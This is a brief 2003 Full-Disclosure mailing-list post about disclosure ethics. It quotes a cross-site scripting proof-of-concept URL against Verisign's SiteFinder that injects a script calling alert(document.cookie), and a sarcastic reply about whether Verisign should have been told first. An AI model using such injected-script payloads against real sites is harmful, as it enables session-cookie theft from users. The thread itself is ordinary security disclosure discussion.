> On Mon, Sep 15, 2003 at 08:35:43PM -0700, [EMAIL PROTECTED] wrote: >> with a XSS bug, this works in IE: >> Other less exciting versions of this XSS: >> http://sitefinder.verisign.com/lpc?url=meow'><DEFANGED_script>alert(document.cookie)</script><' > > Did you _at least_ tell Verisign about this before posting this?
Did Verisign tell us they were going to deploy this vulnerability before doing so ad infinitum? pablos. -- Paul Holman [EMAIL PROTECTED] _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
